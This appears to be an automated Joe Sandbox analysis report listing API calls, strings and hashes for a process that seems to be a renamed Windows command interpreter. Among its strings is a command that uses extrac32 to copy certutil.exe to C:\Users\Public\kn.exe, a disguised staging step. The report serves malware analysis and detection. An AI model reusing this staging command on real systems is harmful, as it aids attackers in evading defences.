                                                                                      • API String ID: 2221118986-0
                                                                                      • Opcode ID: 4ec132db5a5163512eeab285e6cca4fd0bb6ff7b6cd64baaaa3bea2245e3dd05
                                                                                      • Instruction ID: ed92fd6246142c3ac660be14d400e5292272be5bc89bb8397acd7f27979f6731
                                                                                      • Opcode Fuzzy Hash: 4ec132db5a5163512eeab285e6cca4fd0bb6ff7b6cd64baaaa3bea2245e3dd05
                                                                                      • Instruction Fuzzy Hash: 7AC1E622A0978696FBB5EB31E8D4AB9A3AAFB59784F844131DA0D57790DF3CE540C310
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1775698487.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      • Associated: 00000003.00000002.1775684412.00007FF793740000.00000002.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000003.00000002.1775723253.00007FF793772000.00000002.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79377D000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF793781000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79378F000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000003.00000002.1775781241.00007FF793799000.00000002.00000001.01000000.00000004.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: Heap$AllocProcess
                                                                                      • String ID:
                                                                                      • API String ID: 1617791916-0
                                                                                      • Opcode ID: 3743209a10b96ebcc181eebe11116311313ddf8ce3d63fdcd25b8e532d2a8f02
                                                                                      • Instruction ID: c2a282afcf74806ef2661e3f94be221c3685c2d533af2c76fc701539b355ab79
                                                                                      • Opcode Fuzzy Hash: 3743209a10b96ebcc181eebe11116311313ddf8ce3d63fdcd25b8e532d2a8f02
                                                                                      • Instruction Fuzzy Hash: 8DA19321A1865282FBB4AB36A4D5679A6EAFF8DB90F804135DD4E63791DF3CF401C720
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1775698487.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      • Associated: 00000003.00000002.1775684412.00007FF793740000.00000002.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000003.00000002.1775723253.00007FF793772000.00000002.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79377D000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF793781000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79378F000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000003.00000002.1775781241.00007FF793799000.00000002.00000001.01000000.00000004.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: memset$DiskFreeSpace
                                                                                      • String ID: %5lu
                                                                                      • API String ID: 2448137811-2100233843
                                                                                      Similarity
                                                                                      • API ID: _wcsicmp
                                                                                      • String ID: GeToken: (%x) '%s'
                                                                                      • API String ID: 2081463915-1994581435
                                                                                      Similarity
                                                                                      • API ID: wcschr
                                                                                      • String ID:
                                                                                      • API String ID: 1497570035-0
                                                                                      Similarity
                                                                                      • API ID: Find$File$CloseFirstNext
                                                                                      • String ID:
                                                                                      • API String ID: 3541575487-0
                                                                                      APIs
                                                                                        • Part of subcall function 00007FF79374CD90: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF79374B9A1,?,?,?,?,00007FF79374D81A), ref: 00007FF79374CDA6
                                                                                        • Part of subcall function 00007FF79374CD90: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF79374B9A1,?,?,?,?,00007FF79374D81A), ref: 00007FF79374CDBD
                                                                                      • _pipe.MSVCRT ref: 00007FF793746C1E
                                                                                      • _get_osfhandle.MSVCRT ref: 00007FF793746CD1
                                                                                      • DuplicateHandle.API-MS-WIN-CORE-HANDLE-L1-1-0 ref: 00007FF793746CFB
                                                                                      Similarity
                                                                                      • API ID: Heapwcschr$AllocDuplicateHandleProcess_dup_dup2_get_osfhandle_pipe_wcsicmpmemset
                                                                                      • String ID:
                                                                                      • API String ID: 624391571-0
                                                                                      Similarity
                                                                                      • API ID: CurrentDebugDebuggerOutputPresentStringThread
                                                                                      • String ID:
                                                                                      • API String ID: 4268342597-0
                                                                                      Similarity
                                                                                      • API ID: OpenToken$CloseProcessThread
                                                                                      • String ID:
                                                                                      • API String ID: 2991381754-0
                                                                                      APIs
                                                                                      • GetVersion.API-MS-WIN-CORE-SYSINFO-L1-1-0(?,?,?,?,?,?,00000000,00007FF79376C59E), ref: 00007FF793745879
                                                                                        • Part of subcall function 00007FF7937458D4: RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF793745903
                                                                                        • Part of subcall function 00007FF7937458D4: RegQueryValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF793745943
                                                                                        • Part of subcall function 00007FF7937458D4: RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF793745956
                                                                                      Similarity
                                                                                      • API ID: CloseOpenQueryValueVersion
                                                                                      • String ID: %d.%d.%05d.%d
                                                                                      • API String ID: 2996790148-3457777122
                                                                                      Similarity
                                                                                      • API ID: memset$ErrorFileFindFirstLast
                                                                                      • String ID:
                                                                                      • API String ID: 2831795651-0
                                                                                      APIs
                                                                                      • memset.MSVCRT ref: 00007FF793747DA1
                                                                                        • Part of subcall function 00007FF79375417C: GetCurrentDirectoryW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00007FF7937541AD
                                                                                        • Part of subcall function 00007FF79374D3F0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF79374D46E
                                                                                        • Part of subcall function 00007FF79374D3F0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF79374D485
                                                                                        • Part of subcall function 00007FF79374D3F0: wcschr.MSVCRT ref: 00007FF79374D4EE
                                                                                        • Part of subcall function 00007FF79374D3F0: iswspace.MSVCRT ref: 00007FF79374D54D
                                                                                        • Part of subcall function 00007FF79374D3F0: wcschr.MSVCRT ref: 00007FF79374D569
                                                                                        • Part of subcall function 00007FF79374D3F0: wcschr.MSVCRT ref: 00007FF79374D58C
                                                                                      • ??_V@YAXPEAX@Z.MSVCRT ref: 00007FF793747EB7
                                                                                      Similarity
                                                                                      • API ID: wcschr$Heapmemset$AllocCurrentDirectoryProcessiswspace
                                                                                      • String ID:
                                                                                      • API String ID: 168394030-0
                                                                                      • Opcode ID: a65c63928f551fb8768bc8e3d10b498b84304c82453fdb636945e23039fb0caa
                                                                                      • Instruction ID: 380368a43a885dcd59d3f8f1a700ad94268da354d2dbefbadd514fc4cd035330
                                                                                      • Opcode Fuzzy Hash: a65c63928f551fb8768bc8e3d10b498b84304c82453fdb636945e23039fb0caa
                                                                                      • Instruction Fuzzy Hash: 4CA1F821B0C68695FBF8AB3594D42B9A396FF8C784F804136D91E676E5DF3CE8058320
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1775698487.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      Similarity
                                                                                      • API ID: InformationQueryToken
                                                                                      • String ID:
                                                                                      • API String ID: 4239771691-0
                                                                                      • Opcode ID: ea3ebf219b67d46e5b1987a5c063cf7b613a027b1816fa6f4767aceb48b770b4
                                                                                      • Instruction ID: 5ccda49e4c33dca3ea3f06259198d7ef9e3a9f4aacfb780ecc9ae8bb95f359a9
                                                                                      • Opcode Fuzzy Hash: ea3ebf219b67d46e5b1987a5c063cf7b613a027b1816fa6f4767aceb48b770b4
                                                                                      • Instruction Fuzzy Hash: 59118272B18781DBFB609F11E4803A9FBA8FB88795F444132DB48127A4DB7CD588CB51
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1775698487.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      Similarity
                                                                                      • API ID: FileInformation$HandleQueryVolume
                                                                                      • String ID:
                                                                                      • API String ID: 2149833895-0
                                                                                      • Opcode ID: 625d3b3e026192d6aa05ab746e3d747582aa1c91c48dbe730e9190b973acbc48
                                                                                      • Instruction ID: f3ec6496aa6fd5018c3b6c43816e9508ad8f7a8840dd5ecf7ea5779118e49c6c
                                                                                      • Opcode Fuzzy Hash: 625d3b3e026192d6aa05ab746e3d747582aa1c91c48dbe730e9190b973acbc48
                                                                                      • Instruction Fuzzy Hash: 2A1191317086C287E7B09B61F4803AAF7A4FB88B44F805135DA8D62A54DFBCD848CB10
                                                                                      APIs
                                                                                        • Part of subcall function 00007FF79374D3F0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF79374D46E
                                                                                        • Part of subcall function 00007FF79374D3F0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF79374D485
                                                                                        • Part of subcall function 00007FF79374D3F0: wcschr.MSVCRT ref: 00007FF79374D4EE
                                                                                        • Part of subcall function 00007FF79374D3F0: iswspace.MSVCRT ref: 00007FF79374D54D
                                                                                        • Part of subcall function 00007FF79374D3F0: wcschr.MSVCRT ref: 00007FF79374D569
                                                                                        • Part of subcall function 00007FF79374D3F0: wcschr.MSVCRT ref: 00007FF79374D58C
                                                                                      • towupper.MSVCRT ref: 00007FF7937485D4
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1775698487.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      Similarity
                                                                                      • API ID: wcschr$Heap$AllocProcessiswspacetowupper
                                                                                      • String ID:
                                                                                      • API String ID: 3520273530-0
                                                                                      • Opcode ID: 4bf984449d6576c9e1357fbba499d80d7c4b4475721f5272d0d4c1e3d8a5570f
                                                                                      • Instruction ID: 601d528181ead93c3b46ed4fef7f3909367bdeccaa3ca22bc6363a51146acbb1
                                                                                      • Opcode Fuzzy Hash: 4bf984449d6576c9e1357fbba499d80d7c4b4475721f5272d0d4c1e3d8a5570f
                                                                                      • Instruction Fuzzy Hash: 6961C221A0820691F7F8BF349588379E6E9FB1C794F808136DA1E762D5DF3DA8908231
                                                                                      APIs
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1775698487.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      Similarity
                                                                                      • API ID: InformationQueryToken
                                                                                      • String ID:
                                                                                      • API String ID: 4239771691-0
                                                                                      • Opcode ID: 7517614d59da3da2d62857270a17558918b7290ddd6fc4d467c09f47fe27c059
                                                                                      • Instruction ID: c25d42885753497845a52907855268569ca1690f8844494c5813c33184599f22
                                                                                      • Opcode Fuzzy Hash: 7517614d59da3da2d62857270a17558918b7290ddd6fc4d467c09f47fe27c059
                                                                                      • Instruction Fuzzy Hash: 6FF030B3714B81CBD7009F64E58449CB778F748B84B95853ACB2903704DB75D9A4CB50
                                                                                      APIs
                                                                                      • SetUnhandledExceptionFilter.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7937593BB
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1775698487.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      Similarity
                                                                                      • API ID: ExceptionFilterUnhandled
                                                                                      • String ID:
                                                                                      • API String ID: 3192549508-0
                                                                                      • Opcode ID: eff4557ae00fe4591a940a5480948ed29a826f3915cdbc5be4334919315eb20c
                                                                                      • Instruction ID: ca47975138509e2284d60b8d2212b51269b7d8bc9139629d49ed6665516c5eb3
                                                                                      • Opcode Fuzzy Hash: eff4557ae00fe4591a940a5480948ed29a826f3915cdbc5be4334919315eb20c
                                                                                      • Instruction Fuzzy Hash: 43B09210E65442D1E658BB319CC106452A46B6D711FC00472C00E94260DE1C929B8720
                                                                                      APIs
                                                                                      • EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,00000000,?,00007FF79374F52A,00000000,00000000,?,00000000,?,00007FF79374E626,?,?,00000000,00007FF793751F69), ref: 00007FF79374F8DE
                                                                                      • LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000000,00007FF793751F69,?,?,?,?,?,?,?,00007FF79374286E,00000000,00000000,00000000,00000000), ref: 00007FF79374F8FB
                                                                                      • EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000000,00007FF793751F69,?,?,?,?,?,?,?,00007FF79374286E,00000000,00000000,00000000,00000000), ref: 00007FF79374F951
                                                                                      • LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000000,00007FF793751F69,?,?,?,?,?,?,?,00007FF79374286E,00000000,00000000,00000000,00000000), ref: 00007FF79374F96B
                                                                                      • wcschr.MSVCRT(?,?,00000000,00007FF793751F69,?,?,?,?,?,?,?,00007FF79374286E,00000000,00000000,00000000,00000000), ref: 00007FF79374FA8E
                                                                                      • _get_osfhandle.MSVCRT ref: 00007FF79374FB14
                                                                                      • SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(?,?,00000000,00007FF793751F69,?,?,?,?,?,?,?,00007FF79374286E,00000000,00000000,00000000,00000000), ref: 00007FF79374FB2D
                                                                                      • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,00000000,00007FF793751F69,?,?,?,?,?,?,?,00007FF79374286E,00000000,00000000,00000000,00000000), ref: 00007FF79374FBEA
                                                                                      • _get_osfhandle.MSVCRT ref: 00007FF79374F996
                                                                                        • Part of subcall function 00007FF793750010: SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00000000,0000237B,00000000,00000002,0000000A,00000001,00007FF79376849D,?,?,?,00007FF79376F0C7), ref: 00007FF793750045
                                                                                        • Part of subcall function 00007FF793750010: AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,00007FF79376F0C7,?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF79376E964), ref: 00007FF793750071
                                                                                        • Part of subcall function 00007FF793750010: ReadFile.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF793750092
                                                                                        • Part of subcall function 00007FF793750010: ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00007FF7937500A7
                                                                                        • Part of subcall function 00007FF793750010: MultiByteToWideChar.API-MS-WIN-CORE-STRING-L1-1-0 ref: 00007FF793750181
                                                                                      • EnterCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000000,00007FF793751F69,?,?,?,?,?,?,?,00007FF79374286E,00000000,00000000,00000000,00000000), ref: 00007FF79375D401
                                                                                      • LeaveCriticalSection.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000000,00007FF793751F69,?,?,?,?,?,?,?,00007FF79374286E,00000000,00000000,00000000,00000000), ref: 00007FF79375D41B
                                                                                      • longjmp.MSVCRT(?,?,00000000,00007FF793751F69,?,?,?,?,?,?,?,00007FF79374286E,00000000,00000000,00000000,00000000), ref: 00007FF79375D435
                                                                                      • longjmp.MSVCRT(?,?,00000000,00007FF793751F69,?,?,?,?,?,?,?,00007FF79374286E,00000000,00000000,00000000,00000000), ref: 00007FF79375D480
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1775698487.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      Similarity
                                                                                      • API ID: CriticalSection$EnterFileLeave$LockPointerShared_get_osfhandlelongjmp$AcquireByteCharErrorLastMultiReadReleaseWidewcschr
                                                                                      • String ID: =,;$extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe
                                                                                      • API String ID: 3964947564-518410914
                                                                                      • Opcode ID: ac10f6592d03a1150df86db3bbd316513fcc4d2075019832c3c795bce2986d35
                                                                                      • Instruction ID: 4dea3c7923613abccdd6491e998231a6ebaf1f18d6c0d7ad5f0db015f76b0458
                                                                                      • Opcode Fuzzy Hash: ac10f6592d03a1150df86db3bbd316513fcc4d2075019832c3c795bce2986d35
                                                                                      • Instruction Fuzzy Hash: 02026A21A19A4286FAB8BB31A8C4179E6ADFF4DB55FD44536D90E623A0DF3CB401C731
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1775698487.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      Similarity
                                                                                      • API ID: _wcsicmp$iswspacewcschr
                                                                                      • String ID: ;$=,;$FOR$FOR/?$IF/?$REM$REM/?
                                                                                      • API String ID: 840959033-3627297882
                                                                                      • Opcode ID: a685c2dfbfb933869e1ee9a5fd26f57dd0ea790cc444f73fb6d6a268455a5bb9
                                                                                      • Instruction ID: 55caf40d60eed00f949c72f76f33d469d593bea933cac95817ffe81c0b68df98
                                                                                      • Opcode Fuzzy Hash: a685c2dfbfb933869e1ee9a5fd26f57dd0ea790cc444f73fb6d6a268455a5bb9
                                                                                      • Instruction Fuzzy Hash: 3DD17C20E08643C6FBF8BB31A8C42B9A6A8BF5DB45FC45436D54E662A5DF3CE4058731
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1775698487.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      Similarity
                                                                                      • API ID: _wcsicmp$EnvironmentVariable
                                                                                      • String ID: .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC$CMDCMDLINE$CMDEXTVERSION$DATE$ERRORLEVEL$HIGHESTNUMANODENUMBER$RANDOM$TIME
                                                                                      • API String ID: 198002717-267741548
                                                                                      • Opcode ID: 86cb16d536f244c24baf619aaa5ba530f3c61f8a6c087709382502a2cbb2fdc2
                                                                                      • Instruction ID: 5263a2895660247c5ef798a28a5fe3f884b47812d10c1880a179b9e411a0a438
                                                                                      • Opcode Fuzzy Hash: 86cb16d536f244c24baf619aaa5ba530f3c61f8a6c087709382502a2cbb2fdc2
                                                                                      • Instruction Fuzzy Hash: 00510F25A0864385FAB46B31A894279EBA8FF4EB81FC49036C90F63764DF2CE544D771
                                                                                      APIs
                                                                                      • iswspace.MSVCRT(00000000,00000000,?,00000000,?,00007FF79374E626,?,?,00000000,00007FF793751F69), ref: 00007FF79374F000
                                                                                      • wcschr.MSVCRT(?,?,00000000,00007FF793751F69,?,?,?,?,?,?,?,00007FF79374286E,00000000,00000000,00000000,00000000), ref: 00007FF79374F031
                                                                                      • iswdigit.MSVCRT(?,?,00000000,00007FF793751F69,?,?,?,?,?,?,?,00007FF79374286E,00000000,00000000,00000000,00000000), ref: 00007FF79374F0D6
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1775698487.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      Similarity
                                                                                      • API ID: iswdigitiswspacewcschr
                                                                                      • String ID: ()|&=,;"$=,;$Ungetting: '%s'
                                                                                      • API String ID: 1595556998-2755026540
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1775698487.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      • Associated: 00000003.00000002.1775684412.00007FF793740000.00000002.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000003.00000002.1775723253.00007FF793772000.00000002.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79377D000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF793781000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79378F000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000003.00000002.1775781241.00007FF793799000.00000002.00000001.01000000.00000004.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: Heap$Processwcschr$Alloc$Sizeiswspace
                                                                                      • String ID: "$=,;
                                                                                      • API String ID: 3545743878-4143597401
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1775698487.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      • Associated: 00000003.00000002.1775684412.00007FF793740000.00000002.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000003.00000002.1775723253.00007FF793772000.00000002.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79377D000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF793781000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79378F000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000003.00000002.1775781241.00007FF793799000.00000002.00000001.01000000.00000004.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: CurrentFormatMessageThread
                                                                                      • String ID: $%hs!%p: $%hs(%d) tid(%x) %08X %ws$%hs(%u)\%hs!%p: $(caller: %p) $CallContext:[%hs] $Exception$FailFast$LogHr$Msg:[%ws] $ReturnHr$[%hs(%hs)]$[%hs]
                                                                                      • API String ID: 2411632146-3173542853
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1775698487.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      • Associated: 00000003.00000002.1775684412.00007FF793740000.00000002.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000003.00000002.1775723253.00007FF793772000.00000002.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79377D000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF793781000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79378F000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000003.00000002.1775781241.00007FF793799000.00000002.00000001.01000000.00000004.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: CreateFile_open_osfhandle
                                                                                      • String ID: con
                                                                                      • API String ID: 2905481843-4257191772
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1775698487.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      • Associated: 00000003.00000002.1775684412.00007FF793740000.00000002.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000003.00000002.1775723253.00007FF793772000.00000002.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79377D000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF793781000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79378F000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000003.00000002.1775781241.00007FF793799000.00000002.00000001.01000000.00000004.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: ConsoleMode$Handle$wcsrchr$CaptureContextEntryFunctionLookupUnwindVirtual__raise_securityfailureiswspacewcschr
                                                                                      • String ID:
                                                                                      • API String ID: 3829876242-3916222277
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1775698487.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      • Associated: 00000003.00000002.1775684412.00007FF793740000.00000002.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000003.00000002.1775723253.00007FF793772000.00000002.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79377D000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF793781000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79378F000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000003.00000002.1775781241.00007FF793799000.00000002.00000001.01000000.00000004.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: _wcsicmpmemset$Volume$DriveInformationNamePathType
                                                                                      • String ID: CSVFS$NTFS$REFS
                                                                                      • API String ID: 3510147486-2605508654
                                                                                      APIs
                                                                                      • longjmp.MSVCRT(?,00000000,00000000,00007FF793747279,?,?,?,?,?,00007FF79374BFA9), ref: 00007FF793764485
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1775698487.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      • Associated: 00000003.00000002.1775684412.00007FF793740000.00000002.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000003.00000002.1775723253.00007FF793772000.00000002.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79377D000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF793781000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79378F000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000003.00000002.1775781241.00007FF793799000.00000002.00000001.01000000.00000004.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: longjmp
                                                                                      • String ID: == $EQU $FOR$FOR /?$GEQ $GTR $IF /?$LEQ $LSS $NEQ $REM /?
                                                                                      • API String ID: 1832741078-366822981
                                                                                      APIs
                                                                                        • Part of subcall function 00007FF79374CD90: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF79374B9A1,?,?,?,?,00007FF79374D81A), ref: 00007FF79374CDA6
                                                                                        • Part of subcall function 00007FF79374CD90: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,?,00007FF79374B9A1,?,?,?,?,00007FF79374D81A), ref: 00007FF79374CDBD
                                                                                      • memset.MSVCRT ref: 00007FF79374BA2B
                                                                                      • wcschr.MSVCRT ref: 00007FF79374BA8A
                                                                                      • wcschr.MSVCRT ref: 00007FF79374BAAA
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1775698487.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      • Associated: 00000003.00000002.1775684412.00007FF793740000.00000002.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000003.00000002.1775723253.00007FF793772000.00000002.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79377D000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF793781000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79378F000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000003.00000002.1775781241.00007FF793799000.00000002.00000001.01000000.00000004.sdmp
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_3_2_7ff793740000_alpha.jbxd
                                                                                      Similarity
                                                                                      • API ID: Heapwcschr$AllocProcessmemset
                                                                                      • String ID: -$:.\$=,;$=,;+/[] "
                                                                                      • API String ID: 2872855111-969133440
                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000003.00000002.1775698487.00007FF793741000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF793740000, based on PE: true
                                                                                      • Associated: 00000003.00000002.1775684412.00007FF793740000.00000002.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000003.00000002.1775723253.00007FF793772000.00000002.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79377D000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF793781000.00000004.00000001.01000000.00000004.sdmp
                                                                                      • Associated: 00000003.00000002.1775738945.00007FF79378F000.00000004.00000001.01000000.00000004.sdmp
